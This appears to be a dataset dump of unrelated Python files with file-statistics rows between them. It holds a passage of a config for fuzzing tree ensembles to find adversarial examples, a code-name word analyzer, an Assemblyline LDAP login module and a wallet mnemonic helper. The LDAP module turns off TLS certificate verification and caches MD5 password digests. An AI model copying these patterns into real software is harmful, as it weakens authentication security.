AFL_USE_CMP_LOG = False and not USE_CUSTOM_MUTATOR
ENABLE_DETERMINISTIC = False
SKIP_DETERMINISTIC = False
# see docs/power_schedules.md
AFL_SCHEDULE = None # one of fast(default, use None), explore, exploit, seek, rare, mmopt, coe, lin, quad
# AFL generic
AFL_MUTATE_FILENAME = "afl_mutation.cc"
AFL_OUTPUT_DIR = "afl_out"
# AFL++
AFLPP_DICT_PATH = join(os.getcwd(), 'afl_dict')
AFLPP_TEMPLATE_PATH = "templates/aflpp.jinja2"
MUTATE_TEMPLATE_PATH = "templates/mutate.jinja2"
AFLPP_COMPILER_PATH = "afl-clang-lto++"
# AFLPP_COMPILER_PATH = "afl-clang-fast++"
# AFLGo
AFL_GO_COMPILER_PATH = "/home/cas/AFLGo/afl-clang-fast++"
AFL_GO_FUZZ_PATH = "/home/cas/AFLGo/afl-fuzz"
AFL_GO_GEN_DIST_PATH = "/home/cas/AFLGo/scripts/gen_distance_fast.py"
AFL_GO_TARGETS_FILE = 'BBtargets.txt'
AFLGO_TEMPLATE_PATH = "templates/aflgo.jinja2"
############ honggfuzz settings ############
HONG_COMPILER_PATH = "/home/cas/honggfuzz/hfuzz_cc/hfuzz-clang++"
HONG_FUZZER_PATH = "/home/cas/honggfuzz/honggfuzz"
HONG_OUTPUT_DIR = "hongg_out"
############ Mutation settings ############
MINIMIZE_THRESHOLD_LIST = False # Removes all thresholds within 0.0001 from each other
IS_AE_FAKE = False # Fakes the model query if the current input is an AE
USE_WAS_AE = False # Saves the result of the last known model query
STEEP_CURVE = False # If True, square the draw from the gaussian distribution, such that smaller draws are more likely
# feature importance is calculated by its occurrence
FEATURE_IMPORTANCE_BASED_ON_OCCURRENCE = False and USE_FEATURE_IMPORTANCE
MUTATE_LESS_WHEN_CLOSER = False # When True, multiplies the mutation with the largest diff between fuzzed and victim
# feature used as splitting threshold in the forest. Cannot be True together with AE_MUTATE_TOWARDS_VICTIM.
AE_CHECK_IN_MUTATE = (ALSO_MUTATE_BIGGEST or BIAS_MUTATE_BIG_DIFFS or USE_THRESHOLDS_FOR_MUTATION or
AE_MUTATE_TOWARDS_VICTIM or MUTATE_LESS_WHEN_CLOSER) and FUZZ_ONE_POINT_PER_INSTANCE \
and FUZZER != 'AFL++'
if MUTATE_LESS_WHEN_CLOSER and AE_MUTATE_TOWARDS_VICTIM:
raise ValueError('Mutate less and AE mutate towards original cannot be used together')
############ AE init ############
# k-ANN structure
ANN_TREES = 10 # the number of trees for the "annoy" lookup
K_ANN = 10 # how many nearest neighbours to find
NO_SEED_INIT = False # When True, each run is only seeded with all-0 features. Seeding with no input at all is
# not possible, because the custom mutator would otherwise break.
INITIALIZE_WITH_AE = False # use ANN to seed with K_ANN closest data-points from other classes
INITIALIZE_WITH_AVG_OPPOSITE = False # For binary-classification: seed with average member of the other class
INITIALIZE_WITH_POINT_IN_BETWEEN = INITIALIZE_WITH_POINT_IN_BETWEEN or \
(True and INITIALIZE_WITH_AE)
INITIALIZE_WITH_EXTRA_POINTS_IN_BETWEEN = INITIALIZE_WITH_EXTRA_POINTS_IN_BETWEEN or \
(True and INITIALIZE_WITH_POINT_IN_BETWEEN)
INITIALIZE_WITH_FULL_TRAIN_SET = False # Put all instances of the other class from the train set in the corpus.
if INITIALIZE_WITH_FULL_TRAIN_SET and (INITIALIZE_WITH_AE or DOUBLE_FUZZ_WITH_AE):
raise ValueError('INITIALIZE_WITH_FULL_TRAIN_SET cannot be used with INITIALIZE_WITH_AE or DOUBLE_FUZZ_WITH_AE')
if sum([INITIALIZE_WITH_AE, INITIALIZE_WITH_AVG_OPPOSITE, INITIALIZE_WITH_FULL_TRAIN_SET]) > 1:
raise ValueError('Conflicting initialize options')
############ Testing ############
DEBUG = False # If True, shows output and runs 1 sample with 1 thread only.
MEASURE_COVERAGE = False # Measure coverage through instrumentation, costs exec/s
SKIP_COMPILATION = False
COMPILE_ONLY = False
PRINT_NUMBER_OF_LEAVES = False # Estimate for model size
INVESTIGATE_WITH_SCATTER = False and INVESTIGATE # Shows a scatter plot instead of a line plot when INVESTIGATE
NUM_INVESTIGATE_RUNS = 5 # The number of repetitions for creating plots.
FAILURE_THRES = 0.9 # See FILTER_BAD_AE
SHOW_OUTPUT = False or DEBUG # Shows fuzzer output
CREATE_LOOKUP = False or INITIALIZE_WITH_AE or INITIALIZE_WITH_AVG_OPPOSITE or INVESTIGATE \
or INITIALIZE_WITH_FULL_TRAIN_SET or DOUBLE_FUZZ_WITH_AE
if DEBUG and MEASURE_EXEC_P_S:
raise ValueError('Debug and measure exec/s cannot be used at the same time')
if INVESTIGATE and DOUBLE_FUZZ_WITH_AE:
raise ValueError('Double fuzz together with investigate should not be used.')
NUM_DEBUG = 1
NUM_THREADS = 10 if not DEBUG else NUM_DEBUG # Number of simultaneous fuzzing instances; also used for
# training the ensembles, the MILP attack and the lt-attack (Zhang)
NUM_ADV_SUPER_QUICK = 10 # The number of victims to attack for runs with the -qq flag.
NUM_ADV_QUICK = 50 # The number of victims to attack for runs with the -q flag.
NUM_ADV_CHECKS = 500 if not DEBUG else NUM_DEBUG # number of adversarial victims
MAX_POINTS_LOOKUP = 5000 # The AE lookup will be created over at most this many training samples
DEFAULT_TIME_PER_POINT = 1 # The default fuzzing time per datapoint
MODEL_TYPES = ['RF', 'GB'] # the identifiers of the model types (Random Forest, Gradient Boosting)
DISTANCE_NORMS = ['l_0', 'l_1', 'l_2', 'l_inf']
DISTANCE_NORM = 'l_inf' # the norm to calculate the distance in the fuzzer
if DISTANCE_NORM not in DISTANCE_NORMS:
raise ValueError(f'Norm {DISTANCE_NORM} not recognised, should be one of [{", ".join(DISTANCE_NORMS)}]')
DISTANCE_STEPS = [round(0.005 * i, 3) for i in reversed(range(1, 201))] # [1.0, 0.995, ..., 0.005]
# DISTANCE_STEPS = [round(0.001 * i, 3) for i in reversed(range(1, 1001))] # [1.0, 0.999, ..., 0.001]
# DISTANCE_STEPS = [round(0.01 * i, 2) for i in reversed(range(1, 101))] # [1.0, 0.99, ..., 0.01]
# DISTANCE_STEPS = [round(0.1 * i, 1) for i in reversed(range(1, 11))] # [1.0, 0.9, ..., 0.1]
# DISTANCE_STEPS = [0.8, 0.7, 0.6] \
# + [round(0.01 * i, 2) for i in reversed(range(11, 51))] \
# + [round(0.001 * i, 3) for i in reversed(range(1, 101))] # Decreasing
# DISTANCE_STEPS = [0.8, 0.7] \
# + [round(0.01 * i, 2) for i in reversed(range(25, 70))] \
# + [round(0.001 * i, 3) for i in reversed(range(20, 250))] \
# + [round(0.0001 * i, 4) for i in reversed(range(1, 200))] # Decreasing very small
DISTANCE_STEPS.append(0.000001)
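The decreasing step schedule configured above can be checked in isolation; a minimal stdlib sketch (the variable name `distance_steps` is local to this example):

```python
# Standalone sketch of the decreasing distance-step schedule configured above:
# 200 steps from 1.0 down to 0.005 in 0.005 decrements, plus a tiny final step.
distance_steps = [round(0.005 * i, 3) for i in reversed(range(1, 201))]
distance_steps.append(0.000001)
```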
PROBABILITY_STEPS = [round(0.01 * i, 2) for i in reversed(range(1, 51))] # [0.5, 0.49, ..., 0.01]
# PROBABILITY_STEPS = [0.8, 0.7, 0.6] \
# + [round(0.01 * i, 2) for i in reversed(range(1, 51))] # [0.8, 0.7, 0.6, 0.5, 0.49, ..., 0.01]
# PROBABILITY_STEPS = [round(0.5 + 0.05 * i, 2) for i in reversed(range(1, 11))] \
# + [round(0.2 + 0.01 * i, 2) for i in reversed(range(1, 31))] \
# + [round(0.005 * i, 3) for i in reversed(range(1, 41))]
# Directories, all relative to main folder (code)
CHECK_DIR = "python/.CHECK"
IMAGE_DIR = 'python/img'
RESULTS_DIR = "python/.RESULTS"
COVERAGES_DIR = "python/.COVERAGES"
MODEL_DIR = "python/models"
JSON_DIR = join(MODEL_DIR, 'json')
DATA_DIR = "python/data"
LIB_SVM_DIR = join(DATA_DIR, 'libsvm')
OPEN_ML_DIR = join(DATA_DIR, 'openml')
ZHANG_DATA_DIR = join(DATA_DIR, 'zhang')
CORPUS_DIR = ".GENERATED_CORPUS"
ADV_DIR = ".ADVERSARIAL_EXAMPLES"
ZHANG_CONFIG_DIR = ".ZHANG_CONFIGS"
# Files
NUM_FEATURES_PATH = ".num_features"
LIBFUZZER_TEMPLATE_PATH = "templates/libfuzzer.jinja2"
OUTPUT_FILE = "fuzzme.cc"
# WARNING, run with --reload (once for each dataset) after changing these.
DEFAULT_LEARNING_RATE_GB = 0.1
TEST_FRACTION = 0.2
NUM_SAMPLES = 2500 # For synthetic datasets
# Better not change these
SMALL_PERTURBATION_THRESHOLD = 0.00001
THRESHOLD_DIGITS = 7
BYTES_PER_FEATURE = 8 # float = 4, double = 8
TIME_PRECISION = 4
def get_num_adv(): return NUM_ADV_CHECKS
| 56.651639 | 119 | 0.747667 | 2,130 | 13,823 | 4.628639 | 0.241784 | 0.03124 | 0.00852 | 0.01988 | 0.219799 | 0.148189 | 0.129323 | 0.092301 | 0.06522 | 0.06522 | 0 | 0.027197 | 0.159444 | 13,823 | 243 | 120 | 56.884774 | 0.821327 | 0.424582 | 0 | 0 | 1 | 0 | 0.190149 | 0.044764 | 0 | 0 | 0 | 0 | 0 | 1 | 0.005917 | false | 0 | 0.023669 | 0.005917 | 0.029586 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52a1c2d78cfb1a125c997f8dc53947a5b9217444 | 5,988 | py | Python | code_analyzer/core.py | draihal/code_analyzer | 05f56a3f44bbf9e1ccd9bd25b2fbafb631486ad7 | [
"MIT"
] | null | null | null | code_analyzer/core.py | draihal/code_analyzer | 05f56a3f44bbf9e1ccd9bd25b2fbafb631486ad7 | [
"MIT"
] | null | null | null | code_analyzer/core.py | draihal/code_analyzer | 05f56a3f44bbf9e1ccd9bd25b2fbafb631486ad7 | [
"MIT"
] | null | null | null | import logging
import os
import shutil
import tempfile
from git import Repo
from .ast_analysis import _get_all_names, _get_all_func_names, _generate_trees
from .ntlk_analysis import _get_verbs_from_function_name, _get_nouns_from_function_name
from .utils import _get_count_most_common, _get_converted_names, _convert_tpls_to_lst
logging.basicConfig(
filename='code_analyzer.log',
format='%(asctime)s - %(levelname)s - %(message)s',
datefmt='%d-%b-%y %H:%M:%S',
level=logging.INFO)
class CodeAnalyzer:
"""Code analyzer main class."""
def __init__(
self,
path='C:\\',
lookup='verb',
projects=('', ),
top_size=10,
len_filenames=100,
github_path=None,
):
logging.info("Program started.")
self.path = path
self.github_path = github_path
self.lookup = lookup
self.projects = projects
self.top_size = top_size
self.len_filenames = len_filenames
self.words = []
def _get_filenames(self, path):
"""
Get filenames from path.
:param path: path
:return: list
"""
filenames = []
        for dirname, dirs, files in os.walk(path, topdown=True):
            for file in files:
                if file.endswith('.py'):
                    filenames.append(os.path.join(dirname, file))
                if len(filenames) >= self.len_filenames:  # ">=" plus the outer break so the cap holds across directories
                    break
            if len(filenames) >= self.len_filenames:
                break
logging.info(f"Path is: {path}.")
logging.info(f"Total {len(filenames)} files.")
return filenames
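The capped collection pattern in `_get_filenames` can be exercised standalone; a minimal sketch against a temporary directory (the helper name `collect_py_files` is illustrative):

```python
# Minimal standalone check of the capped ".py" collection pattern used by
# _get_filenames above: walk a tree, keep .py paths, stop at the limit.
import os
import tempfile

def collect_py_files(path, limit):
    found = []
    for dirname, dirs, files in os.walk(path, topdown=True):
        for file in files:
            if file.endswith('.py'):
                found.append(os.path.join(dirname, file))
            if len(found) >= limit:  # ">=" so the cap holds across directories
                return found
    return found

with tempfile.TemporaryDirectory() as tmp:
    for i in range(5):
        open(os.path.join(tmp, 'mod_%d.py' % i), 'w').close()
    open(os.path.join(tmp, 'notes.txt'), 'w').close()
    result = collect_py_files(tmp, limit=3)
```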
def _get_trees(self, path, with_filenames=False, with_file_content=False):
"""
Returns lists of ast objects.
:param path: path
:return: lists of ast objects
"""
filenames = self._get_filenames(path)
trees = (_generate_trees(filename, with_filenames,
with_file_content)[0]
for filename in filenames)
logging.info("Trees generated.")
return trees
def _get_top_verbs_in_path(self, path):
"""
        Returns a list of tuples with words and their counts.
        :param path: path
        :return: list of tuples with words and their counts
"""
trees = self._get_trees(path)
fncs = _get_converted_names(trees, _get_all_func_names)
verbs = (_get_verbs_from_function_name(function_name)
for function_name in fncs)
converted_verbs = _convert_tpls_to_lst(verbs)
return converted_verbs
def _get_top_nouns_in_path(self, path):
"""
        Returns a list of tuples with words and their counts.
        :param path: path
        :return: list of tuples with words and their counts
"""
trees = self._get_trees(path)
fncs = _get_converted_names(trees, _get_all_func_names)
nouns = (_get_nouns_from_function_name(function_name)
for function_name in fncs)
converted_nouns = _convert_tpls_to_lst(nouns)
return converted_nouns
def _get_all_words_in_path(self, path):
"""
        Returns a list of tuples with words and their counts.
        :param path: path
        :return: list of tuples with words and their counts
"""
trees = self._get_trees(path)
function_names = _get_converted_names(trees, _get_all_names)
all_words_in_path = ((word for word in function_name.split('_')
if word) for function_name in function_names)
converted_all_words_in_path = _convert_tpls_to_lst(all_words_in_path)
return converted_all_words_in_path
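The word-splitting step above can be shown with a tiny stdlib example (the sample identifiers are made up):

```python
# Standalone sketch of the word-splitting step above: snake_case identifiers
# are split on "_", empty parts are dropped, and occurrences are counted.
from collections import Counter

function_names = ['get_user_name', 'get_user_id', '_private_helper']
words = [word for name in function_names for word in name.split('_') if word]
top_two = sorted(Counter(words).most_common(2))
```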
def _get_top_functions_names_in_path(self, path):
"""
        Returns a list of tuples with words and their counts.
        :param path: path
        :return: list of tuples with words and their counts
"""
trees = self._get_trees(path)
fncs = _get_converted_names(trees, _get_all_func_names)
return fncs
def _parse_lookup_args(self, path_):
"""
Parse arguments for lookup.
:param path_: path
:return: None
"""
# verb - show statistics of the most common words by verbs
# noun - show statistics on the most frequent words by nouns
# funcname - show statistics of the most common words function names
# localvarname - show statistics of the most common
# words names of local variables inside functions
lookups_functions = {
'verb': self._get_top_verbs_in_path,
'noun': self._get_top_nouns_in_path,
'funcname': self._get_top_functions_names_in_path,
'localvarname': self._get_all_words_in_path,
}
for project in self.projects:
path = os.path.join(path_, project)
function_for_lookup = lookups_functions.get(self.lookup)
self.words += function_for_lookup(path)
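The dict-based dispatch used in `_parse_lookup_args` can be sketched standalone; the handlers below are illustrative stand-ins, not the real analysis functions:

```python
# Standalone sketch of the dispatch-table pattern in _parse_lookup_args: a dict
# maps each lookup keyword to its handler, avoiding an if/elif chain.
def count_verbs(path):
    return [('run', 3)]

def count_nouns(path):
    return [('tree', 5)]

lookups = {'verb': count_verbs, 'noun': count_nouns}
handler = lookups.get('noun')
result_nouns = handler('some/path') if handler else []
```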
def parse(self):
"""
        Returns a list of tuples with words and their counts.
        :return: list of tuples with words and their counts
"""
if self.github_path:
tmpdir = tempfile.mkdtemp()
logging.info(f'Created temporary directory: {tmpdir}.')
Repo.clone_from(self.github_path, tmpdir)
self._parse_lookup_args(tmpdir)
top_words = _get_count_most_common(self.words, self.top_size)
try:
shutil.rmtree(tmpdir)
except PermissionError:
logging.info(
                'Can\'t delete temp directory. Access is denied.')
logging.info('Done!')
return [] if len(top_words) == 0 else top_words
else:
self._parse_lookup_args(self.path)
top_words = _get_count_most_common(self.words, self.top_size)
logging.info("Done!")
return [] if len(top_words) == 0 else top_words
| 36.512195 | 87 | 0.609552 | 736 | 5,988 | 4.654891 | 0.195652 | 0.021016 | 0.035026 | 0.046702 | 0.424985 | 0.34822 | 0.32662 | 0.296848 | 0.296848 | 0.285464 | 0 | 0.001934 | 0.309285 | 5,988 | 163 | 88 | 36.736196 | 0.826402 | 0.183701 | 0 | 0.125 | 1 | 0 | 0.053345 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086538 | false | 0 | 0.076923 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52a274d162d9e0ff675d928c3cfccd89b9f1212e | 8,449 | py | Python | assemblyline_ui/security/ldap_auth.py | CybercentreCanada/assemblyline-ui | 4b44b26852ef587d1c627fa63c778a135209e25e | [
"MIT"
] | 11 | 2020-06-29T14:31:38.000Z | 2022-01-14T17:15:06.000Z | assemblyline_ui/security/ldap_auth.py | CybercentreCanada/assemblyline-ui | 4b44b26852ef587d1c627fa63c778a135209e25e | [
"MIT"
] | 20 | 2020-06-22T12:35:30.000Z | 2022-03-10T12:41:46.000Z | assemblyline_ui/security/ldap_auth.py | CybercentreCanada/assemblyline-ui | 4b44b26852ef587d1c627fa63c778a135209e25e | [
"MIT"
] | 13 | 2020-08-15T16:10:58.000Z | 2022-01-14T17:15:09.000Z | import base64
import hashlib
import ldap
import logging
import time
from assemblyline.common.str_utils import safe_str
from assemblyline_ui.config import config, CLASSIFICATION
from assemblyline_ui.helper.user import get_dynamic_classification
from assemblyline_ui.http_exceptions import AuthenticationException
log = logging.getLogger('assemblyline.ldap_authenticator')
#####################################################
# Functions
#####################################################
class BasicLDAPWrapper(object):
CACHE_SEC_LEN = 300
def __init__(self, ldap_config):
"""
:param ldap_config: dict containing configuration params for LDAP
"""
self.ldap_uri = ldap_config.uri
self.base = ldap_config.base
self.uid_lookup = f"{ldap_config.uid_field}=%s"
self.group_lookup = ldap_config.group_lookup_query
self.bind_user = ldap_config.bind_user
self.bind_pass = ldap_config.bind_pass
self.admin_dn = ldap_config.admin_dn
self.sm_dn = ldap_config.signature_manager_dn
self.si_dn = ldap_config.signature_importer_dn
self.classification_mappings = ldap_config.classification_mappings
self.cache = {}
self.get_obj_cache = {}
def create_connection(self):
if "ldaps://" in self.ldap_uri:
ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_NEVER)
ldap_server = ldap.initialize(self.ldap_uri)
ldap_server.protocol_version = ldap.VERSION3
ldap_server.set_option(ldap.OPT_REFERRALS, 0)
if self.bind_user and self.bind_pass:
ldap_server.simple_bind_s(self.bind_user, self.bind_pass)
return ldap_server
def get_group_list(self, dn, ldap_server=None):
group_list = [x[0] for x in self.get_object(self.group_lookup % dn, ldap_server)["ldap"]]
group_list.append(dn)
return group_list
def get_user_types(self, group_dn_list):
user_type = ['user']
if self.admin_dn in group_dn_list:
user_type.append('admin')
if self.sm_dn in group_dn_list:
user_type.append('signature_manager')
if self.si_dn in group_dn_list:
user_type.append('signature_importer')
return user_type
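The role-assignment logic in `get_user_types` reduces to membership checks against configured DNs; a standalone sketch (the DNs are made-up examples):

```python
# Standalone sketch of the role-assignment logic in get_user_types above: each
# configured group DN found in the user's membership list adds a role.
ADMIN_DN = 'cn=admins,dc=example,dc=com'
SM_DN = 'cn=sig-managers,dc=example,dc=com'

def user_types(group_dn_list):
    types = ['user']
    if ADMIN_DN in group_dn_list:
        types.append('admin')
    if SM_DN in group_dn_list:
        types.append('signature_manager')
    return types
```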
def get_user_classification(self, group_dn_list):
"""
        Extend the user's classification information with the configured group information
NB: This is not fully implemented at this point
:param group_dn_list: list of DNs the user is member of
:return:
"""
ret = CLASSIFICATION.UNRESTRICTED
for group_dn in group_dn_list:
if group_dn in self.classification_mappings:
ret = CLASSIFICATION.build_user_classification(ret, self.classification_mappings[group_dn])
return ret
def get_object(self, ldap_object, ldap_server=None):
cur_time = int(time.time())
cache_entry = self.get_obj_cache.get(ldap_object, None)
if cache_entry and cache_entry['expiry'] > cur_time:
# load obj from cache
return {"error": None, "ldap": cache_entry['details'], "cached": True}
if not ldap_server:
try:
ldap_server = self.create_connection()
except Exception as le:
return {"error": "Error connecting to ldap server. Reason: %s" % (repr(le)),
"ldap": None, "cached": False}
try:
res = ldap_server.search_s(self.base, ldap.SCOPE_SUBTREE, ldap_object)
# Save cache get_obj
self.get_obj_cache[ldap_object] = {"expiry": cur_time + self.CACHE_SEC_LEN, "details": res}
return {"error": None, "ldap": res, "cached": False}
except ldap.UNWILLING_TO_PERFORM:
return {"error": "ldap server is unwilling to perform the operation.", "ldap": None, "cached": False}
except ldap.LDAPError as le:
return {"error": "An error occurred while talking to the ldap server: %s" % repr(le), "ldap": None,
"cached": False}
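`get_object` caches results with an absolute expiry timestamp; the same pattern can be shown without LDAP (the `now` parameter makes the clock injectable for testing):

```python
# Standalone sketch of the expiry-based cache used by get_object: entries store
# an absolute expiry timestamp and are served until it passes, then refetched.
import time

CACHE_SEC_LEN = 300
cache = {}

def cached_lookup(key, fetch, now=None):
    now = int(time.time()) if now is None else now
    entry = cache.get(key)
    if entry and entry['expiry'] > now:
        return entry['details'], True          # served from cache
    details = fetch(key)
    cache[key] = {'expiry': now + CACHE_SEC_LEN, 'details': details}
    return details, False                      # freshly fetched

calls = []

def fake_fetch(key):
    calls.append(key)
    return 'value-for-' + key

first, hit1 = cached_lookup('cn=users', fake_fetch, now=1000)
second, hit2 = cached_lookup('cn=users', fake_fetch, now=1100)  # still fresh
third, hit3 = cached_lookup('cn=users', fake_fetch, now=1301)   # expired
```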
# noinspection PyBroadException
def login(self, user, password):
cur_time = int(time.time())
password_digest = hashlib.md5(password.encode('utf-8')).hexdigest()
cache_entry = self.cache.get(user, None)
if cache_entry:
if cache_entry['expiry'] > cur_time and cache_entry['password'] == password_digest:
cache_entry["cached"] = True
return cache_entry
try:
ldap_server = self.create_connection()
ldap_ret = self.get_details_from_uid(user, ldap_server=ldap_server)
if ldap_ret and len(ldap_ret) == 2:
dn, details = ldap_ret
group_list = self.get_group_list(dn, ldap_server=ldap_server)
ldap_server.simple_bind_s(dn, password)
cache_entry = {"password": password_digest, "expiry": cur_time + self.CACHE_SEC_LEN,
"connection": ldap_server, "details": details, "cached": False,
"classification": self.get_user_classification(group_list),
"type": self.get_user_types(group_list), 'dn': dn}
self.cache[user] = cache_entry
return cache_entry
except Exception as e:
# raise AuthenticationException('Unable to login to ldap server. [%s]' % str(e))
log.exception('Unable to login to ldap server. [%s]' % str(e))
return None
# noinspection PyBroadException
def get_details_from_uid(self, uid, ldap_server=None):
res = self.get_object(self.uid_lookup % uid, ldap_server)
if res['error']:
log.error(res['error'])
return None
try:
return res['ldap'][0]
except Exception:
return None
def get_attribute(ldap_login_info, key, safe=True):
details = ldap_login_info.get('details')
if details:
value = details.get(key, [])
if len(value) >= 1:
if safe:
return safe_str(value[0])
else:
return value[0]
return None
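`get_attribute` handles the fact that LDAP attribute values arrive as lists; a standalone version of the same pattern (the sample data is made up, and `safe_str` is omitted):

```python
# Standalone version of the get_attribute pattern above: LDAP attribute values
# come back as lists, so the helper returns the first element or None.
def first_or_none(login_info, key):
    details = login_info.get('details') or {}
    value = details.get(key, [])
    return value[0] if len(value) >= 1 else None

info = {'details': {'mail': ['user@example.com'], 'photo': []}}
```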
def validate_ldapuser(username, password, storage):
if config.auth.ldap.enabled and username and password:
ldap_obj = BasicLDAPWrapper(config.auth.ldap)
ldap_info = ldap_obj.login(username, password)
if ldap_info:
cur_user = storage.user.get(username, as_obj=False) or {}
# Make sure the user exists in AL and is in sync
if (not cur_user and config.auth.ldap.auto_create) or (cur_user and config.auth.ldap.auto_sync):
u_classification = ldap_info['classification']
# Normalize email address
email = get_attribute(ldap_info, config.auth.ldap.email_field)
if email is not None:
email = email.lower()
u_classification = get_dynamic_classification(u_classification, email)
# Generate user data from ldap
data = dict(
classification=u_classification,
uname=username,
name=get_attribute(ldap_info, config.auth.ldap.name_field) or username,
email=email,
password="__NO_PASSWORD__",
type=ldap_info['type'],
dn=ldap_info['dn']
)
# Save the user avatar avatar from ldap
img_data = get_attribute(ldap_info, config.auth.ldap.image_field, safe=False)
if img_data:
b64_img = base64.b64encode(img_data).decode()
avatar = f'data:image/{config.auth.ldap.image_format};base64,{b64_img}'
storage.user_avatar.save(username, avatar)
# Save the updated user
cur_user.update(data)
storage.user.save(username, cur_user)
if cur_user:
return username, ["R", "W", "E"]
else:
raise AuthenticationException("User auto-creation is disabled")
elif config.auth.internal.enabled:
# Fallback to internal auth
pass
else:
raise AuthenticationException("Wrong username or password")
return None, None
| 39.297674 | 113 | 0.605871 | 1,012 | 8,449 | 4.815217 | 0.199605 | 0.051303 | 0.022984 | 0.012313 | 0.155756 | 0.101991 | 0.088447 | 0.03386 | 0.027909 | 0 | 0 | 0.004197 | 0.295065 | 8,449 | 214 | 114 | 39.481308 | 0.813969 | 0.075394 | 0 | 0.111111 | 0 | 0 | 0.085662 | 0.015217 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065359 | false | 0.091503 | 0.071895 | 0 | 0.281046 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
52aac1e125cfaa8a910431ade1ba06863dbcee6c | 2,722 | py | Python | garecovery/mnemonic.py | LeoComandini/garecovery | 66f7fe4c15b3866e751162fd990bd5bc8c58ec7a | [
"MIT"
] | 61 | 2017-08-30T13:16:42.000Z | 2022-03-24T16:28:18.000Z | garecovery/mnemonic.py | baby636/garecovery | 9ced74920b804adc3a7be443f09a950a884c8c0c | [
"MIT"
] | 34 | 2017-08-11T16:58:16.000Z | 2022-02-18T09:00:23.000Z | garecovery/mnemonic.py | baby636/garecovery | 9ced74920b804adc3a7be443f09a950a884c8c0c | [
"MIT"
] | 46 | 2017-08-09T18:11:55.000Z | 2022-03-04T05:30:54.000Z | import wallycore as wally
from . import exceptions
from gaservices.utils import h2b
wordlist_ = wally.bip39_get_wordlist('en')
wordlist = [wally.bip39_get_word(wordlist_, i) for i in range(2048)]
def seed_from_mnemonic(mnemonic_or_hex_seed):
"""Return seed, mnemonic given an input string
mnemonic_or_hex_seed can either be:
- A mnemonic
- A hex seed, with an 'X' at the end, which needs to be stripped
seed will always be returned, mnemonic may be None if a seed was passed
"""
if mnemonic_or_hex_seed.endswith('X'):
mnemonic = None
seed = h2b(mnemonic_or_hex_seed[:-1])
else:
mnemonic = mnemonic_or_hex_seed
written, seed = wally.bip39_mnemonic_to_seed512(mnemonic_or_hex_seed, None)
assert written == wally.BIP39_SEED_LEN_512
assert len(seed) == wally.BIP39_SEED_LEN_512
return seed, mnemonic
def wallet_from_mnemonic(mnemonic_or_hex_seed, ver=wally.BIP32_VER_MAIN_PRIVATE):
"""Generate a BIP32 HD Master Key (wallet) from a mnemonic phrase or a hex seed"""
seed, mnemonic = seed_from_mnemonic(mnemonic_or_hex_seed)
return wally.bip32_key_from_seed(seed, ver, wally.BIP32_FLAG_SKIP_HASH)
def _decrypt_mnemonic(mnemonic, password):
"""Decrypt a 27 word encrypted mnemonic to a 24 word mnemonic"""
mnemonic = ' '.join(mnemonic.split())
entropy = bytearray(wally.BIP39_ENTROPY_LEN_288)
assert wally.bip39_mnemonic_to_bytes(None, mnemonic, entropy) == len(entropy)
salt, encrypted = entropy[32:], entropy[:32]
derived = bytearray(64)
wally.scrypt(password.encode('utf-8'), salt, 16384, 8, 8, derived)
key, decrypted = derived[32:], bytearray(32)
wally.aes(key, encrypted, wally.AES_FLAG_DECRYPT, decrypted)
for i in range(len(decrypted)):
decrypted[i] ^= derived[i]
if wally.sha256d(decrypted)[:4] != salt:
raise exceptions.InvalidMnemonicOrPasswordError('Incorrect password')
return wally.bip39_mnemonic_from_bytes(None, decrypted)
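Two primitives used in `_decrypt_mnemonic` can be demonstrated with the stdlib alone: the XOR combine of the AES output with derived key material, and the sha256d checksum compared against the salt. The byte values here are dummies, not real wallet data:

```python
# Standalone sketch of two primitives used in _decrypt_mnemonic above: the XOR
# combine of the AES output with derived key material, and the sha256d (double
# SHA-256) checksum compared against the salt.
import hashlib

def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def sha256d(data):
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()

decrypted = xor_bytes(b'\x10' * 32, b'\x01' * 32)
checksum = sha256d(decrypted)[:4]
```

XOR is its own inverse, which is why applying the derived bytes a second time recovers the original.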
def check_mnemonic_or_hex_seed(mnemonic):
"""Raise an error if mnemonic/hex seed is invalid"""
if ' ' not in mnemonic:
if mnemonic.endswith('X'):
# mnemonic is the hex seed
return
msg = 'Mnemonic words must be separated by spaces, hex seed must end with X'
raise exceptions.InvalidMnemonicOrPasswordError(msg)
for word in mnemonic.split():
if word not in wordlist:
msg = 'Invalid word: {}'.format(word)
raise exceptions.InvalidMnemonicOrPasswordError(msg)
try:
wally.bip39_mnemonic_validate(None, mnemonic)
except ValueError:
raise exceptions.InvalidMnemonicOrPasswordError('Invalid mnemonic checksum')
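The word-by-word validation in `check_mnemonic_or_hex_seed` can be sketched against a tiny stand-in wordlist (the real BIP39 list has 2048 words; `wordlist_stub` is hypothetical):

```python
# Standalone sketch of the word-by-word check in check_mnemonic_or_hex_seed,
# using a tiny stand-in wordlist instead of the full BIP39 list.
wordlist_stub = {'abandon', 'ability', 'able', 'zoo'}

def invalid_words(mnemonic):
    return [word for word in mnemonic.split() if word not in wordlist_stub]
```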
